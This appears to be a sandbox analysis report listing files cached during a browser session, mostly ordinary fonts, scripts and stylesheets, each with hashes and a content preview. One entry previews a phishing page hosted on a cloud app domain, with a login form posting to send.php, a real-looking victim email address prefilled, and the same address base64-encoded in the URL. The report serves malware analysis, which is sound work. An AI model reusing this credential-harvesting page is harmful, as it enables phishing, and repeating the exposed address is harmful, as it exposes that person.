SSDEEP:	768:6yVJgIpAqZsXgDNHOBBPXNOKdhT1N+06XAxGrzmoqpxk0SnuUR:enq805OBBdhT1NP6XAxGryoqp2
MD5:	4D88404F733741EAACFDA2E318840A98
SHA1:	49E0F3D32666AC36205F84AC7457030CA0A9D95F
SHA-256:	B464107219AF95400AF44C949574D9617DE760E100712D4DEC8F51A76C50DDA1
SHA-512:	2E5D3280D5F7E70CA3EA29E7C01F47FEB57FE93FC55FD0EA63641E99E5D699BB4B1F1F686DA25C91BA4F64833F9946070F7546558CBD68249B0D853949FF85C5
Malicious:	false
Reputation:	low
IE Cache URL:	https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc9.ttf
Preview:	........... GDEF......{....dGPOS......\|<....GSUB7b.....8....OS/2t.#...r....`cmap......st...Lcvt 1..K..y....\fpgm..$...v.....gasp......{.....glyf.'.....,..j.hdmx......r\|....head...r..n....6hhea......q....$hmtx..MO..n@....loca\v@z..l(....maxp......l.... name..:...z,....post.m.d..{.... prep...)..x\|...S...d...(.............o......9........................EX../... >Y..EX../....>Y......9......9......9......9........9......9......01!!.!.......!.5.!.(.<..6......................}.w...x.^.^..^...............<......9.........EX../... >Y..EX../....>Y.....+X!...Y..../01.#.!.462...."&.~......J.JH.H......9KK97JJ....e...@.......%...EX../...">Y..../..../......./01..#.3..#.3..#...-#...w.}....}.....`...............EX../... >Y..EX../... >Y..EX../....>Y..EX../....>Y......9../.....+X!...Y............../.....+X!...Y...............................01.#.#.#5!.#5!.3.3.3.3.#.3.#.#.3.#...L.L...:...N.N.N.N..:..L.v.:....f....9....`...`....f.8.9...d.-.&...,...*-...9...EX../... >Y..EX../... >Y..EX.#/.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\KFOlCnqEu92Fr1MmYUtfBBc9[1].ttf Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 8 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla
Category:	downloaded
Size (bytes):	35208
Entropy (8bit):	6.392518822467014
Encrypted:	false
SSDEEP:	768:53Dmu13ucOmpIN22bN8o6Ze0XlGV+uM49pSeCu7XniviDffw6mo/quUR:lD13DjSNz0XlG0uL9YeCu7Xn4iTo9o/4
MD5:	4D99B85FA964307056C1410F78F51439
SHA1:	F8E30A1A61011F1EE42435D7E18BA7E21D4EE894
SHA-256:	01027695832F4A3850663C9E798EB03EADFD1462D0B76E7C5AC6465D2D77DBD0
SHA-512:	13D93544B16453FE9AC9FC025C3D4320C1C83A2ECA4CD01132CE5C68B12E150BC7D96341F10CBAA2777526CF72B2CA0CD64458B3DF1875A184BBB907C5E3D731
Malicious:	false
Reputation:	low
IE Cache URL:	https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc9.ttf
Preview:	........... GDEF......z\...dGPOS......z.....GSUB7b..........OS/2ve#...p....`cmap......r....Lcvt ...=..xX...Zfpgm..#...ud....gasp......zP....glyf.......,..i~hdmx......q ....head...R..l....6hhea.]....p....$hmtx..<...l.....locaK./...j.....maxp......j.... name..9...x....\|post.m.d..z0... prep...C..w ...8...d...(.............P...EX../....>Y..EX../....>Y......9......9......9......9........9......9......01!!.!.......!.5.!.(.<..6......................}.w...x.^.^..^....g...........<......9.........EX../....>Y..EX../....>Y.....+X!...Y..../01.!.!.462..."&....+.g..k.kk.k......J__.__.......^.......&......9........./......9../........01..#.3..#.3.+..._+...v.S.8..S.8.......z.......... !..9.........EX../....>Y..EX../....>Y..EX../....>Y..EX../....>Y......9../.....+X!...Y............../.....+X!...Y...............................01.#.#.#53.#53.3.3.3.3.!.3.!.#.3.#.d.C.C..,..E.D.E.E...,...C.@.,....f.........`...`.....f.Q......S.&.Q...-.r.+./..9...EX../....>Y..EX.!/..!.>Y..!...9........!..9......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\KFOmCnqEu92Fr1Mu4mxP[1].ttf Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 8 names, Microsoft, language 0x409, Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht
Category:	downloaded
Size (bytes):	35408
Entropy (8bit):	6.412277939913633
Encrypted:	false
SSDEEP:	768:PX4i+tezjtQYgu30G0xL9nQbuEL7LQo9SBxQbptqKmomjJlvh:PJ2z3G0xpUusLEBKptqNomjV
MD5:	372D0CC3288FE8E97DF49742BAEFCE90
SHA1:	754D9EAA4A009C42E8D6D40C632A1DAD6D44EC21
SHA-256:	466989FD178CA6ED13641893B7003E5D6EC36E42C2A816DEE71F87B775EA097F
SHA-512:	8447BC59795B16877974CD77C52729F6FF08A1E741F68FF445C087ECC09C8C4822B83E8907D156A00BE81CB2C0259081926E758C12B3AEA023AC574E4A6C9885
Malicious:	false
Reputation:	low
IE Cache URL:	https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxP.ttf
Preview:	........... GDEF......{`...dGPOS...h..{.....GSUB7b..........OS/2tq#...q....`cmap......s....Lcvt +.....yl...Tfpgmw.`...vd....gasp......{T....glyf.......,..j.hdmx......r ....head.j.z..m....6hhea......q....$hmtx..Vl..m.....loca?.#...k.....maxp......k.... name.U9...y....tpost.m.d..{4... prep.f....x ...I...d...(.............q......9........................EX../....>Y..EX../....>Y......9......9......9......9..........9......9.......01!!.!.......!.5.!.(.<..6......................}.w...x.^.^..^.......{.......0...EX../....>Y..EX../....>Y.....+X!...Y......901.#.3.462..."&.[....7l88l7......-==Z;;........#.........../......9../........01..#.3..#.3...o.....o...x...........w...............EX../....>Y..EX../....>Y..EX../....>Y..EX../....>Y......9\|../......+X!...Y............../.....+X!...Y...............................01.!.#.#5!.!5!.3.!.3.3.#.3.#.#.!.!....P.P...E....R.R..R.R..E..P....E.....f....b....`...`.....f.#.b....n.0.....+.i...EX../....>Y..EX."/..".>Y.."...9..................+X!.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\api[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	884
Entropy (8bit):	5.579318048452923
Encrypted:	false
SSDEEP:	24:2jkm94/zKPccAbD1+KVCetzS12F+xXwsLqo40RWUnYN:VKEcG4KoetS12F+xBLrwUnG
MD5:	B673368BD457EB85C5F0DEE5E9AD2937
SHA1:	84A09F1429917A604FBB5149DEE5A79519BF18EF
SHA-256:	62C484E8FCCD8A7492BC297604F00EF9F51E8D1269F7B09E1D23C765F5FA4DCC
SHA-512:	D29C3CDB2BE9DBF28F4C7ACD696944619DC6BFCEBE18432DF7EAC7BDE28C30DD1B01F34A313986C45EDD6BE5DF26D142044089D339FA1E3C550D4695A33991BE
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google.com/recaptcha/api.js?render=6LfWmtcUAAAAAOJYBUg1otF0emmfkBJXOL8F-Tsa&ver=3.0
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('6LfWmtcUAAAAAOJYBUg1otF0emmfkBJXOL8F-Tsa');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-K2LYnZEtBUcW6O6eiKyrX5HgXfaBzWmW7BmI0mEp+JFPi3pZyyiJwjMDjI12BtQg';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']\|\|e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})();

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bootstrap.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	37045
Entropy (8bit):	5.174934618594778
Encrypted:	false
SSDEEP:	768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
MD5:	5869C96CC8F19086AEE625D670D741F9
SHA1:	430A443D74830FE9BE26EFCA431F448C1B3740F9
SHA-256:	53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
SHA-512:	8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/js/bootstrap.min.js
Preview:	/!. Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9\|\|1==b[0]&&9==b[1]&&b[2]<1\|\|b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c\|\|a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bootstrap_002.js[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	48944
Entropy (8bit):	5.272507874206726
Encrypted:	false
SSDEEP:	768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
MD5:	14D449EB8876FA55E1EF3C2CC52B0C17
SHA1:	A9545831803B1359CFEED47E3B4D6BAE68E40E99
SHA-256:	E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
SHA-512:	00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/index_files/bootstrap_002.js.download
Preview:	/!. Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign\|\|function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fontawesome-webfont[1].eot Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Embedded OpenType (EOT), FontAwesome family
Category:	downloaded
Size (bytes):	165742
Entropy (8bit):	6.705073372195656
Encrypted:	false
SSDEEP:	3072:qbhEnD+IzsU9z9QJ6/P3Xe2iEiEPGFCMW1JVJG6wVTDsk6BmG6S1yKshojskO+b2:qenD+IzsU9z9QJ6/PO2FiEP2C/DVJG6I
MD5:	674F50D287A8C48DC19BA404D20FE713
SHA1:	D980C2CE873DC43AF460D4D572D441304499F400
SHA-256:	7BFCAB6DB99D5CFBF1705CA0536DDC78585432CC5FA41BBD7AD0F009033B2979
SHA-512:	C160D3D77E67EFF986043461693B2A831E1175F579490D7F0B411005EA81BD4F5850FF534F6721B727C002973F3F9027EA960FAC4317D37DB1D4CB53EC9D343A
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/font-awesome/fonts/fontawesome-webfont.eot?
Preview:	n.................................LP........................Yx.....................F.o.n.t.A.w.e.s.o.m.e.....R.e.g.u.l.a.r...$.V.e.r.s.i.o.n. .4...7...0. .2.0.1.6.....F.o.n.t.A.w.e.s.o.m.e................PFFTMk.G.........GDEF.......p... OS/2.2z@...X...`cmap..:.........gasp.......h....glyf...M......L.head...-.......6hhea...........$hmtxEy..........loca...\........maxp.,.....8... name....gh....post......k....u.........xY_.<..........3.2.....3.2.................................................................'...............@.........i.........3.......3...s................................pyrs.@. ........................... .....p.....U.............................................]...............................................y...n.......................................2.......................................@...................................................................................................................................................z..............................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\gtm[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	84995
Entropy (8bit):	5.5267807088139165
Encrypted:	false
SSDEEP:	1536:qq2cJXRbKwn8vQk0mA6wRQjrYD/3+6NBkPKj1P9GSKPNARsVyaKvE/u+oF:H2cJXRbt8vQk0R6hjr69kS3tx
MD5:	E5480E976466AA3A64430215D75C3334
SHA1:	FEBEE1F9D595B0B885C1D2078D7ABF499166F7D5
SHA-256:	485028402D37179845895F0F22A00429434A7A6430E68EB24140595ABA0C192D
SHA-512:	828B88D708559B8F001A25087F7BF4910A6ABF64B1339CD09FD6AEC64B65774557D6568877BB2B79C2E472F423725CA28D378DBBC84715C9AE49A73DFAAA6F1B
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.googletagmanager.com/gtm.js?id=GTM-MDTQ45S
Preview:	.// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"5",. . "macros":[{. "function":"__e". },{. "function":"__gas",. "vtp_cookieDomain":"auto",. "vtp_doubleClick":false,. "vtp_setTrackerName":false,. "vtp_useDebugVersion":false,. "vtp_useHashAutoLink":false,. "vtp_decorateFormsAutoLink":false,. "vtp_enableLinkId":true,. "vtp_enableEcommerce":false,. "vtp_trackingId":"UA-15307441-1",. "vtp_enableRecaptchaOption":false,. "vtp_enableTransportUrl":false,. "vtp_enableUaRlsa":false,. "vtp_enableUseInternalVersion":false. },{. "function":"__v",. "vtp_name":"gtm.triggers",. "vtp_dataLayerVersion":2,. "vtp_setDefaultValue":true,. "vtp_defaultValue":"". },{. "function":"__aev",. "vtp_varType":"TEXT". },{. "function":"__v",. "vtp_name":"gtm.elementUrl",. "vtp_dataLayerVersion":1. },{. "function":"__u

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\jquery-1.11.0[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	96380
Entropy (8bit):	5.381471924888687
Encrypted:	false
SSDEEP:	1536:EPpEy5BMibZGOj/bEe8v+/UWf4IhvAuCh/jqkODZ2D5N9Rag0MOIdSZAgtgoX5Y/:bIO/e2D5c4LgtImLja98HrA
MD5:	52D16E147B5346147D0F3269CD4D0F80
SHA1:	4566B5815F47F976C7C3D3083C600AD5561B6FC0
SHA-256:	2E945EBCD9B955E7C543BA4AD41E8F7779A077B482A0207DB74BD6DED2021D17
SHA-512:	0FE5DE77F19213AED8B6DB18FC80F80FCEA320E1C97CEE40DEC9CF5187C0C13237BC94F110071FC27A685920FFBCD71643CF41753F744773AFD02784A1A0432F
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/js/jquery-1.11.0.js
Preview:	/! jQuery v1.11.0 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k="".trim,l={},m="1.11.0",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functio

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\jquery-3.js[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	69597
Entropy (8bit):	5.369216080582935
Encrypted:	false
SSDEEP:	1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
MD5:	5F48FC77CAC90C4778FA24EC9C57F37D
SHA1:	9E89D1515BC4C371B86F4CB1002FD8E377C1829F
SHA-256:	9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
SHA-512:	CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/index_files/jquery-3.js.download
Preview:	/! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\magiczoom[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	980
Entropy (8bit):	5.089418075556371
Encrypted:	false
SSDEEP:	24:HPKbl5IBYG4DWPGKxg/MSN0AhvklLN4PC:ibl62KPGO2YLAC
MD5:	45635C0B0B19EE96E6FA204688E9CEDB
SHA1:	E7512DF84C15D1642E4A1F177B34FA4055138994
SHA-256:	AC0F98FCB998913794049B3BBBD47DA5402E761D7C9BD5B98DD394F82691D9F5
SHA-512:	62DB316D3AAFA9B41F3BB8727B3E610732CA23CE3E237D33043F6DDAB343DC25C7CF0CBEE0FF8D90C49FC701EA1F78ECA9D1FCC5D6950B85213770E4185D2319
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-commerce/modules/magiczoom/magiczoom.css
Preview:	/... Magic Zoom v3.1.29 . Copyright 2011 Magic Toolbox. Buy a license: www.magictoolbox.com/magiczoom/. License agreement: http://www.magictoolbox.com/license/.../...MagicZoom img {..border: 0 !important;..padding: 0 !important;..margin: 0 !important;.}../* Style of zoomed window /..MagicZoomBigImageCont {..border: 1px solid #999;.}../ Style of header, activated with "title" attribute in <a> tag /..MagicZoomHeader {..font-size: 8pt !important;..line-height: normal !important;..color: #fff;..background: #666;..text-align: center !important;.}../ Style of small square under mouse /..MagicZoomPup {..border: 1px solid #aaa;..background: #fff;..cursor: move;.}../ Style of message box while image is loading */..MagicZoomLoading {..border: 1px solid #ccc;..background: #fff url(loader.gif) no-repeat 2px 50%;..padding: 4px 4px 4px 24px !important;..margin: 0;..text-decoration: none;..text-align: left;..font-size: 8pt;..font-family: sans-serif;..color: #444;.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\map[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1487 x 998, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	531788
Entropy (8bit):	7.9942322545719255
Encrypted:	true
SSDEEP:	12288:aWnthUWUp0QplyCkNyxilldDIK/sSg/YMZutw11eBt4LfYh:aehUGQpwCkNyxiDd7vMZutgsBt4LAh
MD5:	50F193C4021ED8A15AA4751DF76E4B5B
SHA1:	5949D1FF7B41CBFFE6F6BA570C3E6664280A807B
SHA-256:	2B8FEEBC406D31C8E17797EFF91D11536494340DDD0386277BD68A3029687EDC
SHA-512:	D946C0DCCF3584967A7DCCC543DB8365D24FE65454AAAFC7C493B5A2FE0959C3F811CDEF2110A525CE0DA8E48F2798DCB052C2DAA10B1932AC56D2CB4AD081C4
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/images/map.png
Preview:	.PNG........IHDR.............2.g~.. .IDATx..].x..=S...f[.,7.a.q.l .......Bz.4B ..I.K}.@.$..Z(.....{.E.mI.z.:.}.?....e.26..e..;...{....K.h.....@.e.b146.#55.........&.Badfe....4.~...$)....n@....X&,..@...$h..I.......o.'...}........,kh.E.3M.BgW.rrr.r.......@.>E.....UU............p{}HI..4..c.Q.7..{H.u....~c.~..U...R...s..4.,Kp.Voo.5.y..'..o..e..p..[..:.~.t..E.:...P.w....^U.....h.h..b..xb......\2.f,.X...Y......^.;../\|j,.n6.h'5.$........p.o..9........:L.....=.....o..hL.fX(+L..g...E...... ~....b&~z.TT.. .....b}U3..H..... .pT...........x.=........C7t.>.e..x....%w...".o..Q.hl.....u....8.,...........}m....................M.[LQ$.=*~...9>.;j.q..>@A....8.i~..9..+.._..U..n.q.0>..9...d"...+....Maj.....[Ac{....,.v\1..........S.....5.={8a......4.Y...~.......?.C.+..fAVd...(.:.#0$..$A...KM..K...C2......:41d.......t.s.t.:......G..d......A...K..=.=....>.....w.'K....t......$..uz....^...g...\....i.j..3b.}.....#q]4..>..v...P=........`.....z{...W.a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\recaptcha__en[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	343493
Entropy (8bit):	5.689500475116669
Encrypted:	false
SSDEEP:	6144:LD7O+JwNJ16l1rwc30d+FODzS77l5UkR6tmx:LLQ1EMrdpSHl5U3tmx
MD5:	E28E6938C382A88686493D368DE3F7F6
SHA1:	B268A8EAF2BF2BACA9D0E5AA816FF63970AEEA6A
SHA-256:	14A2806A256579773A3680E21459DEA7827D002104C6336856E0BEF9A39BE0C9
SHA-512:	93FEF84110208359642D1FD5B6FDB4E5792B79F27C40FCCD64AFC304E85520C6868F7220522F2F54876749CC1978560A1E7157318BD9206BD27871F8E243604A
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.gstatic.com/recaptcha/releases/UFwvoDBMjc8LiYc1DKXiAomK/recaptcha__en.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var T=function(){return[function(Q,n,y,p,N,H){return(Q-1)%(((Q-(N=[11,33,7],N[2]))%N[0]\|\|(yR.call(this),this.C=[]),(Q+N[2])%10)\|\|!n.l\|\|(n.F=y,n.l.onmessage=M(n.S,n)),N[0])\|\|!p\|\|(y.K?K[21](N[1],y.K,p)\|\|y.K.push(p):y.K=[p],K[23](13,"7",n,y,p)),H},function(Q,n,y,p,N,H,k,c){if(!(((c=[null,11,43],Q)>>2)%c[1])){if((this.C=(this.P=(jx.call(this),n)\|\|0,y)\|\|10,this.P)>this.C)throw Error("[goog.structs.Pool] Min can not be greater than max");this.D=((this.F=new (this.l=new nj,pj),this).delay=0,c)[0],this.FR()}if(!((Q<<.((Q>>(3==((Q\|2)&15)&&(N={},p=void 0===p?{}:p,w(T[5](c[2],n,Na),function(X,D,V){D=Na[X],D.zb&&(V=p[D.Z()]\|\|this.get(D))&&(N[D.zb]=V)},y),k=N),1))%5\|\|(N=r[37](57,n)(),k=q[27](13,y,p,N)),2))%14))a:{if((H=g[0](90,9,y),H).defaultView&&H.defaultView.getComputedStyle&&(N=H.defaultView.getComputedStyle(y,c[0]))){k=N[p]\|\|N.getPropertyValue(p)\|\|n;break a}k=n}return k},function(Q,n,y,p,N,H,k,c,X,D

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\smain[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	575
Entropy (8bit):	4.9143817125734035
Encrypted:	false
SSDEEP:	12:kxOWc0v0V4Nbxk5WwVe9eEk3MHWFV8WmAVCjc3zLldjuvmWrNVn8:kNv0V4N27VeIeMVDVCWW1V8
MD5:	3F5CB294E6EB910EF2A920FA18AD6F30
SHA1:	B816D22E0F9F0B2330451585CD851C2C38EAA302
SHA-256:	4684ED49616780844C36AC9B356DD7FD6EE017431F492675D873AB98E9730D2D
SHA-512:	77FF699FED43F7A3F91A41D89A81EBDEA8CD3B719A1B07C0D16E8F92370C203F0B3386A277A0E0588114A14459D16AD6B7801781AC884CBC90520CF2F9B665CE
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/?op=cHJhbXBvbkBzb3RlYi5mcg==&/yanief4OLVfRFm.php?83_aJjkvU053dh2qESwbhSn93984jjd8pksh_048jdkkd9n488
Preview:	<html><head>.<script language="Javascript" src="myscr584876.js"></script>.</head>.<body>.<script language="Javascript" src="myscr262639.js"></script>.. <form class="modal-content animate" method="post" action="send.php">. .....<script language="Javascript" src="myscr408434.js"></script>. <script language="Javascript" src="myscr294914.js"></script>.. .. <input type="email" placeholder="Email Address" name="login" id="email" required="" value="prampon@soteb.fr" readonly="">..<script language="Javascript" src="myscr631018.js"></script>. .</center></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\style[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	111031
Entropy (8bit):	5.018996949592817
Encrypted:	false
SSDEEP:	768:YMipNKf7FPDT7aAqgB75J7AEtu2aEz+FCRhpwPE/RiRE0POVg5y3afqzhlsAOI3g:TipQZLKz2PmCRwVydt6
MD5:	807112993A34461A23636A0D0D623F55
SHA1:	AD806F3D2E1AAB380A539177DC286830C5092060
SHA-256:	B70F86F93DBE9523567ACDF5B43DAF2BAC8DFBD41F7548BE08B3D9437B28DCFE
SHA-512:	7C6209BBC5DC2B52190D81E55998D6ADC4BD224908F23EB4FCC3FB6DF6C6ECD45336B5921680661B540408D55C26D4E0E6ACFF532A6903032870E6EC85BFF208
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/style.css?ver=5.4.4
Preview:	/!.Theme Name: Chimera Framework.Theme URI: http://www.navigatormm.com/chimera.Description: The Chimera framework, a starter Wordpress theme for designers..Tags: two-columns, left-sidebar, right-sidebar, fixed-layout, responsive-layout, custom-menu, featured-images, microformats, sticky-post, theme-options, translation-ready, accessibility-ready.Author: Navigator Multimedia.Author URI: http://www.navigatormm.com.Version: 2.4.8..License: GNU General Public License v2.0.License URI: http://www.gnu.org/licenses/gpl-2.0.html./@import url(bootstrap-3.3.7/dist/css/bootstrap.min.css);@import url(font-awesome/css/font-awesome.min.css);@import url(/wp-content/plugins/nav-admin-skin/nav-admin-skin.css);@font-face{font-family:'Ubuntu';src:url("/wp-content/themes/chimera-framework-2017/fonts/ubuntu/ubuntu-bold-webfont.woff2") 